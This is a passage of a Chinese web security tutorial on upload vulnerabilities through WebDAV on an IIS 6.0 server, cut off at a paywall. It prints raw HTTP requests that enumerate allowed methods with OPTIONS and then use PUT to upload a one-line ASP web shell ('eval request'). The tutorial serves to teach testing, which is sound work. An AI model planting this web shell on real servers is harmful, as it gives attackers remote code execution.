目录
上传漏洞
(1)WebDav
WebDav(Web-based Distributed Authoringand Versioning)是一种基于HTTPI.1协议的通信协议,它扩展了HTTP协议,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使HTTP协议更强大。
在开启WebDav扩展的服务器后,如果支持PUT、Move、Copy、Delete 等方法,就可能会 存在一些安全隐患,比如www.secbug.org服务器(IS6.0Web容器)支持WebDav,并且存在PUT、Move、Copy、Delete等方法,那么攻击者就可能通过PUT方法向服务器上传危险本文件,测试步骤如下。
第一步:通过OPTIONS探测服务器所支持的HTTP方法。
请求:
OPTIONS /HTTP/1.1
Host: www.secbug.org响应:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon,19 Aug2013 09:41:45 GMT
AllOW: OPTIONS,TRACE,GET,HEAD,DELETE, COPY,MOVE,PROPFIND,PROPPATCH, SEARC
H,MKCOL,LOCK, UNLOCK
Content-Length:0
Accept-Ranges:none
Server:Microsoft-IIs/6.0
MS-Author-Via: DAV
DASL:<DAV:sql>
DAV:1,2
Public:OPTIONS,TRACE,GET,HEAD, DELETE, PUT, POST, COPY,MOVE,MKCOL,PROPFIN
D, PROPPATCH,LOCK, UNLOCK, SEARCH
Set-Cookie:_D_SID-89113465;path=/第二步:通过PUT方法向服务器上传脚本文件。
请求:
PUT /a.txt HTTP/1.1
Host: www.secbug.org
Content-Length: 30
<%eval request("chopper")%>响应:
HTTP/1.1 200 OK
Date: Mon,19 Aug2013 09:48:10 GMT
AllOW: OPTIONS,TRACE,GET,HEAD,DELETE,PUT,COPY,MOVE,PROPFIND,PROPPATCH,
SEARCH,MKCOL,LOCK, UNLOCK
Content-Length:0
Location: http://www.secbug.org/a.txt
Server: Microsoft-IIs/6.0
最低0.47元/天 解锁文章
扫一扫
1135
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
